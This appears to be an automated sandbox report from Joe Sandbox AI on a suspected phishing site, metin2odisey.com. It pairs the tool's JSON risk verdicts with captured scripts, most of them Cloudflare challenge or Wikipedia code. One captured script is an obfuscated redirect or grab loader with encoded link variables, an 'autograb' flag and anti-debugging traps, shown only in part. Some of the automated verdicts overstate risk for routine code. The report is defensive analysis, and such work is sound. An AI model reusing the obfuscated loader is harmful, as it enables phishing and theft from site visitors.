| URL: https://balalayka-life.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://balalayka-life.com |
| URL: https://metin2odisey.com/verytrue/... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script exhibits several moderate-risk behaviors, including external data transmission, use of fallback domains, and aggressive DOM manipulation. While the script appears to have an analytics or telemetry purpose, the lack of transparency and use of obfuscated code raises concerns. Further review is recommended to determine the script's true intent and potential risks."
} |
(function(){window._cf_chl_opt={cvId: '3',cZone: "metin2odisey.com",cType: 'interactive',cRay: '8ff6ccb2ab67436d',cH: 'p7z.41tMv4T36pMvzAmnfMQe7ZXSQ2o0WQEUexUKsPg-1736450583-1.2.1.1-Uaqtpuf1Mt9s2uwosGTQX1lWGq_3SBzRXcF3OorKEA7bdUUKQtEzQC0RviJXlK1f',cUPMDTk: "\/verytrue\/?__cf_chl_tk=jw28X_gmjPtDyyklVwNsmgTMIORaDqudhUGxBJVWpeg-1736450583-1.0.1.1-zbgUQW3YAP6rBeMhNdzLhib8e4UiG96b16Yu7lwGR.0",cFPWv: 'b',cITimeS: '1736450583',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/verytrue\/?__cf_chl_f_tk=jw28X_gmjPtDyyklVwNsmgTMIORaDqudhUGxBJVWpeg-1736450583-1.0.1.1-zbgUQW3YAP6rBeMhNdzLhib8e4UiG96b16Yu7lwGR.0",md: "ywpcHSA4KhIi1uuV256ugdipMBT4vd7jJpmdknouu8U-1736450583-1.2.1.1-8C6dd5v0OpDBnibQfDdehqTeZv28ZKptR1OJx5GQhwSMpGykVEUHITBX3Bn30PD3zutt11lxYOeDQpG3S6E2.Vd4p3F_c1o9sXjKqsUrLAQe5FPGOR88mDY2nLmjsBA.teHxtbkub4EHq8oRHT8bxSnu5CNO8IebCFsiFmeEstQeHRDxBHXgoL7NjiaqvwXe.zlZRJs5VCOVJCxySlVwOBZzTGiUoeqGYTgdvCLPxDlXVN_Llx8M1.oQKuuCRhrNeZU.XoRyP26lMUQHCLsntXME7Z25r_CKnUTz4Od.kN.hvyXoVBud1sIWP3hTMhDKMFgKrSfzQa_UjsS5yRmU.rxNBVNlV7cVOh86hzY0t6todI6K3_O4AaSQA1FKFns3kTW.p8LMDpqkah5s6JrjOFlhG0J6LxrYVnoNyI4TsR6aMNcPiGStih6iwvFLXYHYxgCJ7_Rybe6JP38nIeOOviwrAL.cUS7Nki5grbAmV56nCLjcN8WuqXecvSLrV.Y4vLuL3O89kPy.RsbKZMixITIeP_RFO4bI2LustAS3RNY6KTjq5D0FS1ko9Fn3FENxOySpnL7hLvHZWoeVla3u4u2jEGPDEhmjKEzB8eag7GEQjfE_EshUE57moHn011sD3uDM6lFUvX3mVr4RQo2oKzR.oAtS0a_Z4x0bNcRViDLOpCvwmARlvnEUhs8nPENTBkvPawgwMnUAc_jnLLb3Bs6TjxSHq9.v_jG1pRalAvjtKpoSlbfRqw1ThRP94t.0nwVBgHPpAwLdbcwqT9E7xcWoLA9jXN4nvj5DGa2Do1ZV7XfOzaVB66lSN66fppVuUmTvma7PGRxxb6lm1fpmOmllPy82ibO4zhb63cca3P5Q6Ejm0gbV0aXoXwigKLxfsUECj2NfVuhcnsLrFFpIaPz8dfx1FzoDqXSgKAqxAGA8Rw7DNkRl0Y78QrSeIJGclBcO5y3V9wVvvUCRiKvKcdUi6yjXE3dJ3ua9_501MINnnOEdvIRfyQYlPhhYn2eeZgoPc8CT2jqB90mHfQ9lZDQY2kM4YpdE8Vo6USkLewgozDaGdp3BQzL9t4BvXs6EWTr_Po_GIwxHv7od0ffxCli.C3Zl9p.KTPLSOtT1AMHgAmScSD909DHhuHWJVyZBQSOhVxw_33ZbHW1Nlr7w.PqpzVbVm7_dOO8JPsZ9e6fGfHQX_4Hpe88m_irA6tKZW0uLKy8yKrZ1rSYuIre5vNIxiqARjdIcVQoyUFF67g171228m4eZMIufOz9p_Z_ftPdTsQAwNTOziJ_1iaQ4JEdabQRH_jN2GjhUqhZUnQ9csDKV.sgQOwPzma6Ym9proUp1GmC3EB6dVq7yALe_2b7PWyLQ6Er5i_T26oRomBHCe0oYRKWjXNeYbtEOoQSL0l_jfeXITEHfj6588oHUO5mo64lOcF0FPe7sLLhFZA84oiF5fDMOoPJUlZipi0MJp.R8UxahL0u0LZSCJw45I1qVRwzr2bGq8lD2cMi9ecSpwYORm8.y3SBCByDGVPTCBs6HRicYIe5iP2PZyCNr0QOS9OT_kjY1eVod5AoNDnX.X9ODVLforbD1LQlO_hmpAEIXNyKaC6yRj0o.z2XjTe9orPl2Wa9WadyppcrBDpBuvWmz1f7.ND3rIILgBo_ajnrV5gzpAffG0C9VrSU0amVoH_zoqyhYMawjIUGfNk7BVDfUT8ICBOnEUNZ55I4ZDyZ0CRWjgsmanZAH14Eaw5sPvSFIj36f69uOPneLyGR.cHimlj1wFPTTRicoVzY40GvBKQdyCe0wqbkmKVL_QZe4tv1DgqUOSTCfF4zFIGtGi8NRl1fMNR2V1hAic8gldKdrlRHjx5p0ySvaCvwUVbrQmNEOpDybBpUxNQitQKSry3z9ttpTtR6xna9Z4GR8EJtpgbYRumfIpH3A9jzaSA",mdrd: "d_bgVfwEoV2b3vvhtfKDkO_bDHRbWtfAaatd4Jj3rWI-1736450583-1.2.1.1-P56eXi9Ax5KEGJYfqHr287ChzRMZBuJTVjhcxK.Yzzl3_YjkJbfcNCZBBgBMcovqHC4N0ME6eEG8lyHFuBirdjv7L6KhsGeGKE5l4sQ.pfIKhzIYa1Pw4fIKL_sEYeyPrLSQwoDtdXWqDsjVD_tU3AzJfUl3El0A0S_Lap26qVJ_aqTK9p.RC8muJtiRoW5xQGXHKIxez5RMrolEPAleipGc068kBnfhvkLLtDwNOnd2ICy9wyGDutYP_POF_JajBWAew._nieLo0AJX5rH14vINhFI1kl8aigxxUJJtMj.YtSBxjnbP7T361.Nq0hiMoc7QKIT.c2RUIt0f_8ysn_4fgKWHzx3Pj7qDAngKZcHhcs0BzLnnU3tjHxVAjOkIDKMFVOkk79oM6Z3Kt2kaQ8kYL9SROSK9BeriS4woNLPq9FY3O2hZg42uj35hVrmPvq3Eqhw47aqq6db98Y8.g6kQPmYPlUW9WDsouR0d5JANsnLDsHRCjFM3QV9nnA2iEdSSODyjmRF7utmq7oIiNnCbD0wReGN8djD50.NvpHXCOwQtdPyQS.LwpNaOrhO5Paut.mbGgZ3SWAJLzB7oVIB2o5svx7vKAXDl0WUR6PESCC16ZfPwqUy1cMV0xjJe33ATCgLs9eWtoct6adhpRxlZsCyLcJKiCX2bXVDJkHEvpHc1HgL1xdZERwdDKcyOGYapK75WqeYCXTjgyB1.bGCMZAGI0Wj74Ds3Nfhoz2sLo8s9eo5e8chGv60m19x8HD4BokuiDH4yrPssqwP._F29ncLO3RmVLkW7pl7QE7ihv4CFLCtnCXs8H7llq9vKDYCtP01xSYtyAl2IKv81slJllhfKuGFbAwmw.nOKNwcr0QeHpBS158wvMB9wJVMJEXQCrwcd1LaVD2jKJ1pfCdvCwalbs.Brfkkd3btBqlGR7gCt3cvzWrijZVpTPKM434mki35DoAMALQFgaZFs3vA8CAOWjC6Jy2XfgnbEa8MWsfLCm7I_489EpWeZeAeyrWosmSjrq.HXDX4ADqAobCj.PWqTqvzddVLWoXZpvEp917YSxnn_K5YFlV1PlgYtCbGVtvanCU_MVWSYmMdOUkiArcsw9UehjIrusmvarylbZgRkXqhfzlr_ZdW70H3.4MqzRwZbuAPOHSjyLnK.GyBIxOtmaYeKL9DOVVkDKuUWYIyy_M5zEGdfVsw7Wq_wkcJhExNZgoy6xwfm2mn0ypJ4EtRBuGkgLco5Zn04djv7D8XK3qXkUAXjvv0ne7OvLvk.U |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "This script appears to be related to Cloudflare's security challenge system, which is a legitimate service used to protect websites from abuse. The script sets up various configuration options and translations for the Cloudflare challenge, and does not exhibit any high-risk behaviors. While it uses some legacy APIs like `XDomainRequest`, this is likely due to compatibility reasons and does not pose a significant security risk. Overall, this script is considered low-risk and is likely part of a legitimate website's security measures."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F"},"translations":{"testing_only":"Testing%20only.","turnstile_overrun_description":"Stuck%20here%3F","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_refresh":"Refresh","turnstile_footer_privacy":"Privacy","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_expired":"Expired","turnstile_success":"Success%21","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","human_button_text":"Verify%20you%20are%20human","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_failure":"Error","turnstile_feedback_description":"Send%20Feedback","turnstile_footer_terms":"Terms","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_report":"Having%20trouble%3F","turnstile_timeout":"Timed%20out","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_verifying":"Verifying..."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eV,f4,f7,f9,fa,fb,fn,fz,fF,fG,fH,fR,g2,g6,g7,g8,g9,gd,ge,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1098))/1+parseInt(gI(1062))/2*(-parseInt(gI(907))/3)+parseInt(gI(1166))/4+parseInt(gI(1371))/5+parseInt(gI(1067))/6*(parseInt(gI(197))/7)+-parseInt(gI(780))/8+-parseInt(gI(1133))/9*(-parseInt(gI(1496))/10),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,828935),eM=this||self,eN=eM[gJ(1296)],eO=function(c,gK,f,g,h,i,j,k){for(gK=gJ,f={'qRtBx':function(l,m){return l(m)},'CTfGc':function(l,m){return l%m}},k,h=32,j=eM[gK(789)][gK(1295)]+'_'+0,j=j[gK(1085)](/./g,function(l,m,gL){gL=gK,h^=j[gL(873)](m)}),c=eM[gK(1188)](c),i=[],g=-1;!f[gK(298)](isNaN,k=c[gK(873)](++g));i[gK(1555)](String[gK(1361)](((k&255)-h-f[gK(435)](g,65535)+65535)%255)));return i[gK(727)]('')},eM[gJ(471)]=![],eM[gJ(642)]=function(h2){if(h2=gJ,eM[h2(471)])return;eM[h2(471)]=!![]},eV=0,eN[gJ(1514)]===gJ(325)?eN[gJ(1247)](gJ(899),function(){setTimeout(eY,0)}):setTimeout(eY,0),eM[gJ(811)]=function(c,hl,e){e=(hl=gJ,{'upSCi':function(g,h){return g(h)}});try{return f1(c)}catch(g){return e[hl(1096)](eZ,f0(c))}},eM[gJ(1367)]=function(hm,d,e,f,g){hm=gJ,d={},d[hm(450)]=hm(478),d[hm(1391)]=hm(1523),e=d,f=1,g=1e3*eM[hm(766)][hm(1174)](2<<f,32),eM[hm(1191)](function(hn){hn=hm,eM[e[hn(450)]]&&(eM[hn(406)][hn(1446)](),eM[hn(406)][hn(1592)](),eM[hn(219)]=!![],eM[hn(478)][hn(489)]({'source':hn(940),'widgetId':eM[hn(789)][hn(1090)],'event':hn(323),'cfChlOut':eM[hn(789)][hn(1355)],'cfChlOutS':eM[hn(789)][hn(914)],'code':e[hn(1391)],'rcV':eM[hn(789)][hn(736)]},'*'))},g)},eM[gJ(1340)]=function(g,h,i,ho,j,k,l, |
| URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying you are human. This may take a few seconds.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://metin2odisey.com Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://metin2odisey.com |
| URL: https://challenges.cloudflare.com/turnstile/v0/b/e... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script contains no high-risk or moderate-risk indicators. It appears to be a utility script with functions for handling promises, object manipulation, and error handling. There is no evidence of dynamic code execution, data exfiltration, or interaction with external domains. The code is not obfuscated and does not exhibit aggressive DOM manipulation or legacy practices."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Verify you are human",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://metin2odisey.com/verytrue/... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet simply reloads the current page, which is a common and benign operation. This behavior does not indicate any high-risk or malicious activities."
} |
window.location.reload();
|
| URL: https://metin2odisey.com/verytrue/... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as a challenge platform, the overall behavior is highly suspicious and indicative of a potential security threat."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff6cd063e6f8c89',t:'MTczNjQ1MDU5Ny4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
| URL: https://href.li/?https://en.wikipedia.org/wiki/Lis... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a simple redirect to a Wikipedia page about Microsoft 365 applications. This behavior is common for informational or navigational purposes and does not exhibit any high-risk indicators. The use of `window.location.replace()` is a standard way to redirect users to a new URL. Overall, this script poses a low risk."
} |
/* <![CDATA[ */
window.location.replace( "https:\/\/en.wikipedia.org\/wiki\/List_of_Microsoft_365_Applications" + window.location.hash );
/* */
|
| URL: https://metin2odisey.com/verytrue/... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscation of the script's purpose raise significant security concerns. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and poses a high risk of malicious activity."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff6ccff695341ec',t:'MTczNjQ1MDU5Ni4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
| URL: https://metin2odisey.com/verytrue/... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `eval`, `Function` constructor, and heavily encoded strings indicates a high likelihood of malicious intent. Additionally, the script appears to be attempting to redirect the user to an unknown or suspicious domain, which further increases the risk. Overall, this script demonstrates a clear pattern of malicious activity and should be considered a high-risk threat."
} |
var link = "b3JRakM4MWNNTE5vM3l5Zjc1aWpONllIeG5Dc2F1SnRycWVZUXdpSmc5M2tmTmQybU16WVBvYXBYdjExS1pDcW5HOW9SWlhJZDd3c1ZoVVViQldaRWVTeDN0b0FGbGtxU3gwamQ0VEFwR2hJOFV5VzdEdURNS24yMGdKdGx2VkZSaTZIbVFoQkQ1YUh3Y3VFZlg4emVH";
var random = "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9DbGllbnRfYWNjZXNzX2xpY2Vuc2U=";
var autograb = false;
const _0x370772=_0x4de9;(function(_0x4f6b79,_0x5e87a3){const _0x23902b=_0x4de9,_0x1aa4ca=_0x4f6b79();while(!![]){try{const _0x4ecf9d=parseInt(_0x23902b(0x1f2))/0x1*(-parseInt(_0x23902b(0x1ff))/0x2)+parseInt(_0x23902b(0x202))/0x3+parseInt(_0x23902b(0x201))/0x4*(parseInt(_0x23902b(0x215))/0x5)+parseInt(_0x23902b(0x210))/0x6+-parseInt(_0x23902b(0x200))/0x7*(-parseInt(_0x23902b(0x1fe))/0x8)+-parseInt(_0x23902b(0x1f8))/0x9+-parseInt(_0x23902b(0x1ed))/0xa*(parseInt(_0x23902b(0x1fd))/0xb);if(_0x4ecf9d===_0x5e87a3)break;else _0x1aa4ca['push'](_0x1aa4ca['shift']());}catch(_0x5e20f3){_0x1aa4ca['push'](_0x1aa4ca['shift']());}}}(_0x5cca,0xe5b41));const _0x6d4a3c=(function(){let _0x5cc2bf=!![];return function(_0x9b77da,_0x135712){const _0xf77bb9=_0x5cc2bf?function(){const _0xec2e23=_0x4de9;if(_0x135712){const _0x101ef2=_0x135712[_0xec2e23(0x204)](_0x9b77da,arguments);return _0x135712=null,_0x101ef2;}}:function(){};return _0x5cc2bf=![],_0xf77bb9;};}()),_0x487215=_0x6d4a3c(this,function(){const _0x34a2de=_0x4de9;return _0x487215[_0x34a2de(0x1f3)]()['search'](_0x34a2de(0x1ee))[_0x34a2de(0x1f3)]()[_0x34a2de(0x212)](_0x487215)['search'](_0x34a2de(0x1ee));});_0x487215();const _0x5dbfa7=(function(){let _0x4b0e96=!![];return function(_0xd5d4f3,_0xaef652){const _0x53ffda=_0x4b0e96?function(){if(_0xaef652){const _0x48e2d4=_0xaef652['apply'](_0xd5d4f3,arguments);return _0xaef652=null,_0x48e2d4;}}:function(){};return _0x4b0e96=![],_0x53ffda;};}());(function(){_0x5dbfa7(this,function(){const _0x13ac30=_0x4de9,_0x97b71d=new RegExp('function\x20*\x5c(\x20*\x5c)'),_0x562d3b=new RegExp(_0x13ac30(0x1f7),'i'),_0x4d3b42=_0x3d6ca4(_0x13ac30(0x1fb));!_0x97b71d[_0x13ac30(0x20c)](_0x4d3b42+'chain')||!_0x562d3b[_0x13ac30(0x20c)](_0x4d3b42+'input')?_0x4d3b42('0'):_0x3d6ca4();})();}());const _0x55444a=(function(){let _0x33f15b=!![];return function(_0x57a666,_0x260f9d){const _0x31c56e=_0x33f15b?function(){const _0x59e2eb=_0x4de9;if(_0x260f9d){const _0xb3158f=_0x260f9d[_0x59e2eb(0x204)](_0x57a666,arguments);return _0x260f9d=null,_0xb3158f;}}:function(){};return _0x33f15b=![],_0x31c56e;};}()),_0x4f3632=_0x55444a(this,function(){const _0x2ff6f3=_0x4de9,_0x330ee3=function(){const _0x1dd09b=_0x4de9;let _0x14d87b;try{_0x14d87b=Function('return\x20(function()\x20'+_0x1dd09b(0x218)+');')();}catch(_0x4d6905){_0x14d87b=window;}return _0x14d87b;},_0x131a47=_0x330ee3(),_0x18e009=_0x131a47[_0x2ff6f3(0x206)]=_0x131a47[_0x2ff6f3(0x206)]||{},_0x1706ee=[_0x2ff6f3(0x205),_0x2ff6f3(0x216),'info',_0x2ff6f3(0x203),_0x2ff6f3(0x1f5),_0x2ff6f3(0x1f4),_0x2ff6f3(0x207)];for(let _0x3a4ef4=0x0;_0x3a4ef4<_0x1706ee[_0x2ff6f3(0x1f1)];_0x3a4ef4++){const _0x5abefa=_0x55444a[_0x2ff6f3(0x212)][_0x2ff6f3(0x20e)]['bind'](_0x55444a),_0x2ee7c2=_0x1706ee[_0x3a4ef4],_0x5e394d=_0x18e009[_0x2ee7c2]||_0x5abefa;_0x5abefa[_0x2ff6f3(0x1f6)]=_0x55444a[_0x2ff6f3(0x208)](_0x55444a),_0x5abefa[_0x2ff6f3(0x1f3)]=_0x5e394d['toString'][_0x2ff6f3(0x208)](_0x5e394d),_0x18e009[_0x2ee7c2]=_0x5abefa;}});function _0x5cca(){const _0x49775a=['trace','bind','onload','Error\x20encoding\x20string.','/index?a=','test','while\x20(true)\x20{}','prototype','stateObject','7057404VGAaEh','location','constructor','/index','gger','4989590fceNiz','warn','string','{}.constructor(\x22return\x20this\x22)(\x20)','action','href','2800XoTiRS','(((.+)+)+)+$','call','substring','length','1nDTKwE','toString','table','exception','__proto__','\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)','945234wBsndJ','counter','hash','init','debu','155078irFNIr','8BAihSD','952052hXXCrM','11247859baQcXU','4QpQeNS','5065104jKIhEm','error','apply','log','console'];_0x5cca=function(){return _0x49775a;};return _0x5cca() |
| URL: https://en.wikipedia.org/w/load.php?lang=en&module... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a legitimate and benign script used for managing resource loading and configuration in a web application. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The script is primarily focused on feature detection, configuration management, and resource loading, which are common and expected behaviors in a web application. While the script uses some legacy APIs like `XDomainRequest`, these are not inherently malicious and are likely used for compatibility reasons. Overall, this script seems to be a well-written and standard implementation of a resource loader, and does not raise any significant security concerns."
} |
function isCompatible(){return!!('querySelector'in document&&'localStorage'in window&&typeof Promise==='function'&&Promise.prototype['finally']&&(function(){try{new Function('(a = 0) => a');return true;}catch(e){return false;}}())&&/./g.flags==='g');}if(!isCompatible()){document.documentElement.className=document.documentElement.className.replace(/(^|\s)client-js(\s|$)/,'$1client-nojs$2');while(window.NORLQ&&NORLQ[0]){NORLQ.shift()();}NORLQ={push:function(fn){fn();}};RLQ={push:function(){}};}else{if(window.performance&&performance.mark){performance.mark('mwStartup');}(function(){'use strict';var con=window.console;function Map(){this.values=Object.create(null);}Map.prototype={constructor:Map,get:function(selection,fallback){if(arguments.length<2){fallback=null;}if(typeof selection==='string'){return selection in this.values?this.values[selection]:fallback;}var results;if(Array.isArray(selection)){results={};for(var i=0;i<selection.length;i++){if(typeof selection[i]==='string'){results[
